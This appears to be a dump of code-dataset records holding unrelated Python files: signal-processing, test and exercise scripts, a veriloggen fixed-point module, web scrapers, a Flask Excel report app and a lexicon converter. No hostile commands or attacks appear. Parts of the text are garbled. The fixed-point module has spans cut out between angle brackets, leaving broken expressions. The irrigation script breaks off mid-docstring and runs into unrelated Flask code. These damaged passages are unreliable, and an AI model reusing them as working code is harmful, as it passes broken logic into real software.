self.blocks_file_sink_1 = blocks.file_sink(gr.sizeof_char*1, 'G:\\\\My Drive\\\\ProgrammingProject\\\\MaquinaNativa1\\\\encrypted_data_rr.bin', False)\n self.blocks_file_sink_1.set_unbuffered(False)\n\n\n ##################################################\n # Connections\n ##################################################\n self.msg_connect((self.blocks_tagged_stream_to_pdu_0, 'pdus'), (self.blocks_pdu_to_tagged_stream_0, 'pdus'))\n self.connect((self.blocks_file_source_0, 0), (self.blocks_unpack_k_bits_bb_0, 0))\n self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.blocks_file_sink_1, 0))\n self.connect((self.blocks_pdu_to_tagged_stream_0, 0), (self.blocks_pack_k_bits_bb_0, 0))\n self.connect((self.blocks_tagged_stream_align_0, 0), (self.blocks_tagged_stream_to_pdu_0, 0))\n self.connect((self.blocks_unpack_k_bits_bb_0, 0), (self.digital_correlate_access_code_xx_ts_0, 0))\n self.connect((self.digital_correlate_access_code_xx_ts_0, 0), (self.blocks_tagged_stream_align_0, 0))\n self.connect((self.digital_correlate_access_code_xx_ts_0, 0), (self.qtgui_number_sink_0, 0))\n\n\n def closeEvent(self, event):\n self.settings = Qt.QSettings(\"GNU Radio\", \"AccessControl\")\n self.settings.setValue(\"geometry\", self.saveGeometry())\n self.stop()\n self.wait()\n\n event.accept()\n\n def get_samp_rate(self):\n return self.samp_rate\n\n def set_samp_rate(self, samp_rate):\n self.samp_rate = samp_rate\n\n\n\n\ndef main(top_block_cls=AccessControl, options=None):\n\n if StrictVersion(\"4.5.0\") <= StrictVersion(Qt.qVersion()) < StrictVersion(\"5.0.0\"):\n style = gr.prefs().get_string('qtgui', 'style', 'raster')\n Qt.QApplication.setGraphicsSystem(style)\n qapp = Qt.QApplication(sys.argv)\n\n tb = top_block_cls()\n\n tb.start()\n\n tb.show()\n\n def sig_handler(sig=None, frame=None):\n tb.stop()\n tb.wait()\n\n Qt.QApplication.quit()\n\n signal.signal(signal.SIGINT, sig_handler)\n signal.signal(signal.SIGTERM, sig_handler)\n\n timer = Qt.QTimer()\n timer.start(500)\n timer.timeout.connect(lambda: None)\n\n qapp.exec_()\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jorgealza9206/ProgrammingProject","sub_path":"History/MaquinaNativa1/AccessControl.py","file_name":"AccessControl.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37580874837","text":"# --- Directions\n# Write a function that accepts a string. 
The function should\n# capitalize the first letter of each word in the string then\n# return the capitalized string.\n# --- Examples\n# capitalize('a short sentence') --> 'A Short Sentence'\n# capitalize('a lazy fox') --> 'A Lazy Fox'\n# capitalize('look, it is working!') --> 'Look, It Is Working!'\n\n\nimport pytest\n\n\ndef capitalize_string(s):\n    result = ''\n    # get words\n    words = s.split()\n    # lowercase each word\n    word_list = [word.lower() for word in words]\n    for word in word_list:\n        # uppercase first letter of each word and append to result string along with space\n        word = word[0].upper() + word[1:]\n        result += word+' '\n    # remove trailing space\n    return result.strip()\n\n\ndef test_capitalize_string():\n    assert capitalize_string('a short sentence') == 'A Short Sentence'\n    assert capitalize_string('a lazy fox') == 'A Lazy Fox'\n    assert capitalize_string('look, it is working!') == 'Look, It Is Working!'\n\n\n","repo_name":"chefmohima/CodeBootcampUdemy","sub_path":"capitalize_string.py","file_name":"capitalize_string.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28770630001","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, x):\n#         self.val = x\n#         self.left = None\n#         self.right = None\nimport collections\nfrom typing import List\n\n\nclass Solution:\n    def distanceK(self, root: TreeNode, target: TreeNode, k: int) -> List[int]:\n        par = dict()\n\n        def link_parent(cr, p):\n            if cr:\n                par[cr] = p\n                link_parent(cr.left, cr)\n                link_parent(cr.right, cr)\n\n        link_parent(root, None)\n\n        ans = []\n        q = collections.deque([target])\n        seen = {target}\n        level = 0\n        while q:\n            prev_ln = len(q)\n            for i in range(prev_ln):\n                u = q.popleft()\n                if level == k:\n                    ans.append(u.val)\n                if level < k:\n                    for v in [u.left, u.right, par[u]]:\n                        if v and v not in seen:\n                            seen.add(v)\n                            q.append(v)\n            level += 1\n        return ans\n\n\n\n","repo_name":"shahidul2k9/problem-solution","sub_path":"leetcode/863. All Nodes Distance K in Binary Tree.py","file_name":"863. 
All Nodes Distance K in Binary Tree.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"51"} +{"seq_id":"45740419686","text":"from keras.models import load_model\nimport numpy as np\nimport os\nfrom model import MeronSmart\nfrom model import plot_confusion_matrix\n\n# Flags\ntrain_model_flg = True\ntune_hyperparams_flg = False\nsave_model_flg = True\n\n# Files and directories\nbase_dir = '/Data/kimetrica/meron/kenya_data/meron_link_data'\nfeatures_dir = '/Data/kimetrica/meron/features_fc6'\nmodel_dir = '/Data/kimetrica/meron/models'\nmeta_file = 'meron_meta_processed.csv'\nhyper_param_file = '/Data/kimetrica/meron/hyperparams/'\n\nclasses = ['normal', 'moderate acute malnutrition', 'severe acute malnutrition']\n\n# hyperparameters to optimize over\nparam_dist = {'neurons': [8, 16, 32, 64, 128, 256],\n              'dropout': [0, 0.25, 0.5, 0.75, 0.9],\n              'activation': [\"relu\", \"elu\", \"tanh\"],\n              'optimizer': [\"adam\", \"nadam\", \"adadelta\", \"rmsprop\"],\n              'task_type': [\"classification\"]}\n\ntuned_params = {'neurons': 64,\n                'dropout': 0.25,\n                'activation': \"relu\",\n                'optimizer': \"adam\",\n                'task_type': \"classification\"}\n\n# Instantiate class\nmeron = MeronSmart()\n\n# Prep train/test data\ndata_tt = meron.prep_data(features_dir,\n                          os.path.join(base_dir, meta_file),\n                          out_fname=None,\n                          cname_ind_class='maln_class',\n                          cname_ind='wfh',\n                          cname_merge='photo_id')\n\n# Train nn with option to tune hyperparameters\nif tune_hyperparams_flg:\n    tuned_params = meron.optimize_hyperparameters(\n        data_tt['train_x'], data_tt['train_y'],\n        data_tt['test_x'], data_tt['test_y'],\n        param_dist,\n    )\n# else:\n#     tuned_params = np.load(hyper_param_file).item()\n\nif train_model_flg:\n    conv = meron.train_model(data_tt[\"train_x\"],\n                             data_tt[\"train_y\"],\n                             data_tt[\"test_x\"],\n                             data_tt[\"test_y\"],\n                             tuned_params,\n                             out_fname=save_model_flg)\n\nelse:\n    conv = load_model(os.path.join(model_dir, \"conv_model_classification.h5\"))\n\n# Produce predicted probabilities for training and test examples\nconv_probs_test = conv.predict(data_tt[\"test_x_conv\"])\n\n# Convert probabilities to actual predictions\nconv_test = np.argmax(conv_probs_test, axis=1)\n\n# le = sk.preprocessing.LabelEncoder()\n# le.fit(classes)\n# y_pred = np.argmax(conv_probs_test, axis=1)\n# y_pred = le.inverse_transform(y_pred)\n\n# Evaluate results\nplot_confusion_matrix(data_tt[\"test_y\"], conv_test, classes, normalize=True,\n                      savefig='/Data/kimetrica/meron/figs/cm.jpg')\n","repo_name":"kimetrica/MERON_model","sub_path":"meron/main_example.py","file_name":"main_example.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"19940360560","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport os\nimport sys\nimport copy\n\nimport veriloggen.core.vtypes as vtypes\nfrom veriloggen.core.vtypes import _Numeric\nfrom veriloggen.core.vtypes import _Variable\nfrom veriloggen.core.vtypes import _Constant\n\ndef to_fixed(value, point, signed=False):\n    if point < 0:\n        raise ValueError('point must not be negative')\n    \n    if point == 0:\n        return value\n    \n    if isinstance(value, (int, bool, float)) and isinstance(point, int):\n        mag = 2 ** point\n        return int(value * mag)\n    \n    if isinstance(value, (int, bool)):\n        mag = vtypes.Int(2) ** point\n        return vtypes.Int(value) * mag\n    \n    if isinstance(value, float):\n        mag = vtypes.Int(2) ** 
point\n        return vtypes.Float(value) * mag\n    \n    if hasattr(value, 'signed') and value.signed:\n        signed = True\n    \n    return shift_left(value, point, signed)\n\ndef fixed_to_int(value, point, signed=False):\n    if point < 0:\n        raise ValueError('point must not be negative')\n    \n    if point == 0:\n        return value\n    \n    if isinstance(value, (int, bool, float)) and isinstance(point, int):\n        mag = 2 ** point\n        return int(value / mag)\n    \n    if isinstance(value, (int, bool, float)):\n        mag = vtypes.Int(2) ** point\n        return vtypes.Int(value) / mag\n    \n    if hasattr(value, 'signed') and value.signed:\n        signed = True\n    \n    return shift_right(value, point, signed)\n\ndef fixed_to_int_low(value, point):\n    if point < 0:\n        raise ValueError('point must not be negative')\n    \n    if point == 0:\n        return 0\n    \n    if isinstance(value, (int, bool, float)) and isinstance(point, int):\n        mag = 2 ** point\n        return int(value % mag)\n    \n    return vtypes.And(value, vtypes.Repeat(vtypes.Int(1, 1), point))\n\ndef fixed_to_real(value, point, signed=False):\n    if point < 0:\n        raise ValueError('point must not be negative')\n    \n    if point == 0:\n        return vtypes.SystemTask('itor', value)\n\n    if isinstance(value, float):\n        raise TypeError(\"value is already float.\")\n    \n    if isinstance(value, (int, bool)) and isinstance(point, int):\n        mag = 2 ** point\n        return float(value) / mag\n\n    if hasattr(value, 'signed') and value.signed:\n        signed = True\n\n    width = value.bit_length()\n    msb = (value[width - 1] if isinstance(value, vtypes._Variable) else\n           (value >> (width - 1)) & 0x1)\n    \n    v0 = (vtypes.SystemTask('itor', fixed_to_int(value, point)) +\n          vtypes.SystemTask('itor', fixed_to_int_low(value, point)) /\n          vtypes.SystemTask('itor', vtypes.Int(2) ** point))\n    \n    nv = vtypes.Unot(value) + 1\n    v1 = ((vtypes.SystemTask('itor', fixed_to_int(nv, point)) +\n           vtypes.SystemTask('itor', fixed_to_int_low(nv, point)) /\n           vtypes.SystemTask('itor', vtypes.Int(2) ** point))) * vtypes.SystemTask('itor', -1)\n    \n    return vtypes.Mux(signed and msb == 0, v0, v1)\n\n#-------------------------------------------------------------------------------\ndef adjust(left, right, lpoint, rpoint, signed=True):\n    diff_lpoint = vtypes.Mux(rpoint < lpoint, 0, rpoint - lpoint)\n    diff_rpoint = vtypes.Mux(lpoint < rpoint, 0, lpoint - rpoint)\n    ldata = vtypes.Mux(diff_lpoint == 0, left, shift_left(left, diff_lpoint, signed))\n    rdata = vtypes.Mux(diff_rpoint == 0, right, shift_left(right, diff_rpoint, signed))\n    _ldata = vtypes.Mux(signed, vtypes.SystemTask('signed', ldata), ldata)\n    _rdata = vtypes.Mux(signed, vtypes.SystemTask('signed', rdata), rdata)\n    return _ldata, _rdata\n    \ndef shift_left(value, size, signed=True):\n    if isinstance(value, vtypes.Int):\n        value = value.value\n    \n    if isinstance(value, int) and isinstance(size, int):\n        return value << size\n    \n    if isinstance(value, bool) and isinstance(size, int):\n        return value << size\n    \n    return vtypes.Sll(value, size)\n\ndef shift_right(value, size, signed=True):\n    if isinstance(value, vtypes.Int):\n        value = value.value\n    \n    if isinstance(value, int) and isinstance(size, int):\n        return value >> size\n    \n    if isinstance(value, bool) and isinstance(size, int):\n        return value >> size\n    \n    return vtypes.Mux(signed, vtypes.Sra(value, size), vtypes.Srl(value, size))\n\n#-------------------------------------------------------------------------------\ndef _max_mux(a, b):\n    return vtypes.Mux(a > b, a, b)\n\n#-------------------------------------------------------------------------------\ndef FixedInput(m, name, width=32, point=0, signed=False):\n    var 
= m.Input(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedOutput(m, name, width=32, point=0, signed=False):\n var = m.Output(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedOutputReg(m, name, width=32, point=0, signed=False):\n var = m.OutputReg(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedReg(m, name, width=32, point=0, signed=False):\n var = m.Reg(name, width, signed=signed)\n return Fixed(var, point, signed)\n\ndef FixedWire(m, name, width=32, point=0, signed=False):\n var = m.Wire(name, width, signed=signed)\n return Fixed(var, point, signed)\n\n#-------------------------------------------------------------------------------\nclass Fixed(vtypes.VeriloggenNode):\n def __init__(self, value, point, signed=None, raw=True):\n vtypes.VeriloggenNode.__init__(self)\n self.value = value if raw else to_fixed(value, point)\n self.point = point\n self.signed = vtypes.get_signed(value) if signed is None else signed\n \n def __hash__(self):\n return hash((id(self), self.object_id))\n\n def _adjust(self, value):\n lpoint = self.point\n if not isinstance(value, Fixed):\n rvalue = value\n rsigned = vtypes.get_signed(value)\n rpoint = 0\n else:\n rvalue = value.value\n rsigned = value.signed\n rpoint = value.point\n\n ldiff = vtypes.Mux(lpoint <= rpoint, 0, lpoint - rpoint)\n rdiff = vtypes.Mux(lpoint >= rpoint, 0, rpoint - lpoint)\n v = vtypes.Mux(lpoint>rpoint, shift_left(rvalue, ldiff, rsigned),\n vtypes.Mux(lpoint> self.point\n\n @property\n def dec_part(self):\n mask = vtypes.Mux(self.point==0, 0, vtypes.Repeat(vtypes.Int(1, width=1), self.point))\n return self.value & mask\n\n def _binary_op(self, op, r):\n lvalue = self.value\n lpoint = self.point\n lsigned = self.signed\n \n if not isinstance(r, Fixed):\n rvalue = r\n rsigned = vtypes.get_signed(r)\n rpoint = 0\n else:\n rvalue = r.value\n rsigned = r.signed\n rpoint = r.point\n\n point = _max_mux(lpoint, rpoint)\n signed = lsigned and rsigned\n ldata, rdata = adjust(lvalue, rvalue, lpoint, rpoint, signed)\n\n data = op(ldata, rdata)\n\n return Fixed(data, point, signed)\n\n def _binary_logical_op(self, op, r):\n lvalue = self.value\n \n if not isinstance(r, Fixed):\n rvalue = r\n else:\n rvalue = r.value\n\n return op(lvalue, rvalue)\n\n def __add__(self, r):\n return self._binary_op(vtypes.Plus, r)\n\n def __sub__(self, r):\n return self._binary_op(vtypes.Minus, r)\n\ndef FixedConst(value, point, raw=False):\n return Fixed(value, point, raw=raw)\n","repo_name":"jszheng/codegen","sub_path":"veriloggen/types/fixed.py","file_name":"fixed.py","file_ext":"py","file_size_in_byte":8794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71480942238","text":"#!/usr/bin/python3\n\nimport csv\nimport time\nfrom pprint import pprint\n\nimport js2xml\nimport requests\n\nFIELDNAMES = [\n \"name\",\n \"street_addr\",\n \"city\",\n \"state\",\n \"zipcode\",\n \"phone\",\n \"bed_count\",\n \"web_url\",\n]\n\n\ndef main():\n params = {\"callback\": \"locationDataCallback\", \"_\": int(time.time())}\n\n resp = requests.get(\n \"https://www.chslocationsmap.com/data/map/default/locations.json\", params=params\n )\n print(resp.url)\n\n parsed = js2xml.parse(resp.text)\n\n out_f = open(\"locations.csv\", \"w\", encoding=\"utf-8\")\n\n csv_writer = csv.DictWriter(out_f, fieldnames=FIELDNAMES, lineterminator=\"\\n\")\n csv_writer.writeheader()\n\n for h in parsed.xpath('//property[@name=\"hospitals\"]/array/object'):\n name = 
h.xpath('.//property[@name=\"name\"]/string/text()')[0]\n street_addr = h.xpath('.//property[@name=\"street\"]/string/text()')[0]\n city = h.xpath('.//property[@name=\"city\"]/string/text()')[0]\n state = h.xpath(\"../../../../@name\")[0]\n zipcode = h.xpath('.//property[@name=\"zip\"]/string/text()')[0]\n phone = h.xpath('.//property[@name=\"phone\"]/string/text()')[0]\n if \"<\" in phone:\n phone = None\n\n try:\n bed_count = h.xpath('.//property[@name=\"bedCount\"]/number/@value')[0]\n except:\n bed_count = None\n\n web_url = h.xpath('.//property[@name=\"websiteUrl\"]/string/text()')[0]\n\n row = {\n \"name\": name,\n \"street_addr\": street_addr,\n \"city\": city,\n \"state\": state,\n \"zipcode\": zipcode,\n \"phone\": phone,\n \"bed_count\": bed_count,\n \"web_url\": web_url,\n }\n\n pprint(row)\n\n csv_writer.writerow(row)\n\n out_f.close()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rl1987/dolthub-bounty-hospital-price-transparency-v3","sub_path":"CHS/1_scrape_locations.py","file_name":"1_scrape_locations.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27324572081","text":"import csv, re, argparse\nfrom collections import OrderedDict\n\nmultich_set = set()\ndefinitions = OrderedDict()\n\n##patterns = OrderedDict()\npattern_lst = [] # a list of tuples (cont, iclass, expr, weight, comment)\nsingleton_lst = [] # list of tuples (cont, iclass, input, output, weight, comment)\ncont_set = set()\niclass_set = set()\n\ndef extract_multichs(regexp):\n global multich_set, definitions\n rege = re.sub(r\"([][()|\\$\\&\\-\\+*: ]|\\.[iul]|\\.o\\.)+\", \",\", regexp)\n lst = re.split(r\",\", rege)\n for nm in lst:\n if len(nm) > 1 and (nm not in definitions):\n multich_set.add(nm)\n return\n\ndef add_perc(str):\n return re.sub(r\"([{'}])\", r\"%\\1\", str)\n\ndef proj_down_regex(str):\n lst = re.split(r\"([\\]\\[\\|\\-\\+\\* ]+|\\.[iul]|\\.o\\.)\", str)\n downlst = [re.sub(r\"([a-zåäö'øØ0]):({[a-zåäö'øØ]+}|0)\", r\"\\2\", el) for el in lst]\n reslst = [re.sub(r\"^0$\", r\"\", el) for el in downlst]\n res = \"\".join(reslst)\n res = re.sub(r\"\\s+\\[\\s*\\|\\s*\\]\\s*\", r\" \", res)\n res = re.sub(r\"\\s+\", r\" \", res)\n res = re.sub(r\"\\s+$\", r\"\", res)\n return res\n\ndef patterns2converter(outfile):\n global multich_set, iclass_set, cont_set\n print(\"Multichar_Symbols\", file=outfile)\n print(\" \", \" \".join(sorted(multich_set)), file=outfile)\n print(\" \", \" \".join(sorted(iclass_set)), file=outfile)\n print(\" \", \" \".join(sorted(cont_set)), file=outfile)\n print(\"Definitions\", file=outfile)\n for dn in definitions.keys():\n print(\" \", dn, \"=\", add_perc(definitions[dn]), \";\", file=outfile)\n print(\"LEXICON Root\", file=outfile)\n for cont, iclass, input, output, weight, comment in singleton_lst:\n w = ' \"weight: ' + weight + '\"' if weight else \"\"\n i_class = re.sub(r\"([*])\", r\"%\\1\", iclass)\n print(input + i_class + \":\" + output ,\n cont, w, '; !', comment, file=outfile)\n for cont, iclass, pat, weight, comment in pattern_lst:\n ##w = ' \"weight: ' + weight + '\"' if weight else \"\"\n w = \"::\" + weight if weight else \"\"\n i_class = re.sub(r\"([*])\", r\"%\\1\", iclass)\n print(\"<\", add_perc(pat[1:-1]),\n i_class + \":0\" + w + \" >\",\n cont, \"; !\", comment, file=outfile)\n for cont in sorted(list(cont_set)):\n print(\"LEXICON\", cont, file=outfile)\n print(\":% \" + cont, \"# ;\", file=outfile)\n return\n\ndef 
patterns2guesserlex(outfile):\n    print(\"Multichar_Symbols\", file=outfile)\n    print(\" \", \" \".join(sorted(multich_set)), file=outfile)\n    print(\" \", \" \".join(sorted(cont_set)), file=outfile)\n    print(\"Definitions\", file=outfile)\n    for dn in definitions.keys():\n        downde = proj_down_regex(definitions[dn])\n        print(\" \", dn, \"=\", add_perc(downde), \";\", file=outfile)\n    print(\"LEXICON Root\", file=outfile)\n    for cont, iclass, input, output, weight, comment in singleton_lst:\n        w = ' \"weight: ' + weight + '\"' if weight else \"\"\n        print(output, cont, w, '; !', comment, file=outfile)\n    for cont, iclass, pat, weight, comment in pattern_lst:\n        w = '\"weight: '+weight+'\"' if weight else \"\"\n        downpat = proj_down_regex(pat[1:-1])\n        print(\"<\", add_perc(downpat), \">\", cont, w, \";\", file=outfile)\n    return\n\nargparser = argparse.ArgumentParser(\n    \"python3 entry-pattern.py\",\n    description=\"Writes a LEXC file for either a guesser or a converter\")\nargparser.add_argument(\n    \"input\", help=\"A csv input file containing the patterns as regular expressions\")\nargparser.add_argument(\n    \"output\", help=\"A LEXC output file. The patterns are \"\n    \"converted into appropriate LEX entries.\")\nargparser.add_argument(\n    \"-c\", \"--classes\",\n    help=\"Produce a converter instead of a guesser and \"\n    \"output a file containing all inflectional class identifiers \"\n    \"found in the patterns. Output them as a space-separated string\")\nargparser.add_argument(\"-d\", \"--delimiter\", default=\",\",\n                       help=\"CSV field delimiter (default is ',')\")\nargparser.add_argument(\n    \"-v\", \"--verbosity\", default=0, type=int,\n    help=\"level of diagnostic output\")\nargs = argparser.parse_args()\n\npatfile = open(args.input, \"r\")\npat_rdr = csv.DictReader(patfile, delimiter=args.delimiter)\nprevID = \";;;\"\nfor r in pat_rdr:\n    if args.verbosity >= 10:\n        print(r)\n    cont, i_class, mfon, comment = r['CONT'], r['ICLASS'], r['MPHON'], r['COMMENT']\n    if cont != \"\" and cont[0] == '!':\n        if args.verbosity >= 10:\n            print(\"- it is a comment line\")\n        continue\n    if cont == \"Define\":\n        if args.verbosity >= 10:\n            print(\"- it is a definition\")\n        definitions[i_class] = mfon\n    else:\n        cont_set.add(cont)\n        iclass_set.add(i_class)\n        m = re.match(r\"^\\s*(<.*>)\\s*([0-9]*)\\s*$\", mfon)\n        if m: # it looks like a reg ex pattern\n            if args.verbosity >= 10:\n                print(\"- it is a pattern\")\n            regex = m.group(1)\n            weight = m.group(2)\n            pattern_lst.append((cont, i_class, regex, weight, comment))\n            continue\n        m = re.match(r\"^\\s*([a-zåäöšž']+):([a-zåäöšžA-ZÅÄÖŠŽ{Ø'}]+)\\s*([0-9]*)\\s*$\",\n                     mfon)\n        #print(cont, i_class, mfon)###\n        if m: # it looks like a direct result for a single entry\n            if args.verbosity >= 10:\n                print(\"- it is a single entry\")\n            singleton_lst.append((cont, i_class,\n                                  m.group(1), m.group(2), m.group(3),\n                                  comment))\n        else: # not valid at all\n            print(\"***\", r, \"***\")\n\npatfile.close()\n#print(singleton_lst)###\n\nfor cont, iclass, pat, weight, comment in pattern_lst:\n    extract_multichs(pat[1:-1])\nfor dn,pe in definitions.items():\n    extract_multichs(pe)\n\noutfile = open(args.output, \"w\")\nif args.classes:\n    patterns2converter(outfile)\n    if args.classes:\n        classfile = open(args.classes, \"w\")\n        print(\" \".join(sorted(list(iclass_set))), file=classfile)\n        classfile.close()\nelse:\n    
patterns2guesserlex(outfile)\n\n","repo_name":"koskenni/pytwolc","sub_path":"entry-pattern.py","file_name":"entry-pattern.py","file_ext":"py","file_size_in_byte":6098,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"51"} +{"seq_id":"34184596510","text":"\"\"\"\ntitle: Greatest Common Divisor of Strings\n\nFor two strings s and t, we say \"t divides s\" if and\n\nonly if s = t + ... + t (i.e., t is concatenated with itself one or more times).\n\nGiven two strings str1 and str2,\nreturn the largest string x such that x divides both str1 and str2.\n\nExample 1:\n Input: str1 = \"ABCABC\", str2 = \"ABC\"\n Output: \"ABC\"\n\nExample 2:\n Input: str1 = \"ABABAB\", str2 = \"ABAB\"\n Output: \"AB\"\n\nExample 3:\n Input: str1 = \"LEET\", str2 = \"CODE\"\n Output: \"\"\n\"\"\"\n\n\nimport math\n\n\nclass Solution(object):\n def gcdOfStrings(self, str1, str2):\n \"\"\"\n :type str1: str\n :type str2: str\n :rtype: str\n \"\"\"\n n = len(str1)\n m = len(str2)\n\n if (str1 + str2) == (str2 + str1):\n # 找最大公因數 (by string)\n gcd_idx = math.gcd(n, m)\n\n return str1[:gcd_idx]\n\n else:\n return \"\"\n\n\nsolution = Solution()\n\nstr1 = \"ABCABC\"\nstr2 = \"ABC\"\nresult = solution.gcdOfStrings(str1, str2)\nprint(result)\n\nstr1 = \"ABABAB\"\nstr2 = \"ABAB\"\nresult = solution.gcdOfStrings(str1, str2)\nprint(result)\n\nstr1 = \"LEET\"\nstr2 = \"CODE\"\nresult = solution.gcdOfStrings(str1, str2)\nprint(result)","repo_name":"RexIscodingnow/python_practice","sub_path":"leetcode_QA/Greatest Common Divisor of Strings.py","file_name":"Greatest Common Divisor of Strings.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"34617823703","text":"import json\nimport re\n\n\n@service(\"irrigation_unlimited.list_config\")\ndef irrigation_unlimited_list_config(entity_id, section, first=None):\n \"\"\"yaml\n name: List configuration\n description: Load up an input_select entity with Irrigation Unlimited config data\n fields:\n entity_id:\n description: An entity from the input_select domain\n example: input_select.irrigation_unlimited_entities\n required: true\n selector:\n entity:\n domain: input_select\n\n section:\n description: The type of list to load up\n example: entities\n required: true\n selector:\n select:\n options:\n - entities\n - sequences\n\n first:\n description: The first item in the list\n example: \r\n \r\n \r\n \r\n \r\n \"\"\"\r\n\r\n@app.route('/transform', methods=[\"POST\"])\r\ndef transform_view():\r\n f = request.files['data_file']\r\n\r\n # Check for upload file\r\n if not f:\r\n return \"No file\"\r\n if '.csv' in f.filename:\r\n outfile = reportdate + '_' + f.filename[:-4] + '.xlsx'\r\n else:\r\n return \"Selected file is not a csv, please check your file and try again\" \r\n\r\n # Convert uploaded file from stream to dataframe\r\n stream = io.StringIO(f.stream.read().decode(\"UTF8\"), newline=None)\r\n \r\n # Prep stream for writing to dataframe\r\n stream.seek(0)\r\n \r\n # Write stream to dataframe\r\n df = pd.read_csv(stream)\r\n\r\n # Populate array with list of unique employee names from input file\r\n employeelist = getEmplList(df)\r\n\r\n # Setup excel file for input \r\n outputStream = BytesIO()\r\n writer = pd.ExcelWriter(outputStream, engine='xlsxwriter')\r\n \r\n # Create summary array\r\n EmployeeSummary = []\r\n for e in employeelist:\r\n employeeresult = df[df['EmployeesInvolved'].str.contains(e, case=False)]\r\n dev_count = 
len(employeeresult)\r\n EmployeeSummary.append([e, dev_count])\r\n \r\n # Convert summary array to dataframe\r\n SummaryResult = pd.DataFrame(EmployeeSummary)\r\n \r\n # Write summary to summary tab in excel file\r\n dropList = [\"Employee\", \"Dev Count\"]\r\n SummaryResult.to_excel(writer, sheet_name='Summary', index=False)\r\n\r\n # Write employee specific tabs and data to excel file\r\n dropList = [\"Center\", \"DaysOpen\", \"Status\", \"DateClosed\", \"RootCause\", \"AssociatedDeviationCAPANumber\"]\r\n for e in employeelist:\r\n listResult = df[df['EmployeesInvolved'].str.contains(e,case= False)]\r\n listResult = listResult.drop(dropList, axis=1)\r\n listResult.to_excel(writer, sheet_name=e, index=False)\r\n \r\n # Close excel file and prepare to send file back to user\r\n writer.close()\r\n outputStream.seek(0)\r\n\r\n # Return processed file to user\r\n return send_file(outputStream, attachment_filename=outfile, as_attachment=True)\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host='0.0.0.0', debug=True)\r\n","repo_name":"CrypticDog/webdevparser","sub_path":"webdevparser.py","file_name":"webdevparser.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32088164194","text":"from bs4.element import ProcessingInstruction\nimport requests\nfrom bs4 import BeautifulSoup\nimport urllib.parse\nimport json\ndef getDetails(username):\n url=f'https://www.github.com/{username}/'\n r=requests.get(url)\n # print(url)\n htmlContent=r.content\n soup=BeautifulSoup(htmlContent,'html.parser')\n try:\n \n name=(soup.find('span',class_='p-name vcard-fullname d-block overflow-hidden').text)\n # print(name)\n username=(soup.find('span',class_='p-nickname vcard-username d-block').text)\n # print(username)\n imageurl=soup.find('img',class_='avatar avatar-user width-full border color-bg-default').get('src')\n # print(imageurl)\n\n #bio\n bio='None'\n if soup.find('div',class_='p-note user-profile-bio mb-3 js-user-profile-bio f4'):\n bio=(soup.find('div',class_='p-note user-profile-bio mb-3 js-user-profile-bio f4').text)\n # following and starts\n try:\n f=(soup.find('div',class_=\"flex-order-1 flex-md-order-none mt-2 mt-md-0\").text)\n followdetails=((f.split()))\n except :\n followdetails='000000'\n\n #details\n details={'homeLocation': 'None', 'url': 'None', 'twitter': 'None','worksFor':'None','bio':'None'}\n det=soup.find('ul',class_='vcard-details')\n for d in det.find_all('li'):\n\n if d.find('a') == None:\n details[d.get('itemprop')]=\"\".join(d.text.split())\n else:\n details[d.get('itemprop')]=d.find('a').get('href')\n #contributions\n c=soup.find('h2',class_='f4 text-normal mb-2').text\n #organizations\n org={}\n o=soup.find('div',class_='border-top color-border-secondary pt-3 mt-3 clearfix hide-sm hide-md')\n if o is None:\n pass\n else:\n\n z=o.find_all('a',class_='avatar-group-item')\n for i in z:\n link=f\"https://github.com/{str(i.get('href'))}\"\n org[i.get('aria-label')]=link\n #pinned projects\n p=soup.find_all('p',class_=\"pinned-item-desc color-text-secondary text-small d-block mt-2 mb-3\")\n repo=soup.find_all('span',class_='repo')\n pinedpeojectstitle=[]\n # pinedprojectsinfo=[]\n for i in repo:\n pinedpeojectstitle.append(\"\".join(i.text.split()))\n\n # for i in p:\n # pinedprojectsinfo.append(\" \".join(i.text.split()))\n # projects=(json.dumps(dict(zip(pinedpeojectstitle,pinedprojectsinfo)),indent=4))\n projects=pinedpeojectstitle\n except AttributeError:\n return 'Enter valid 
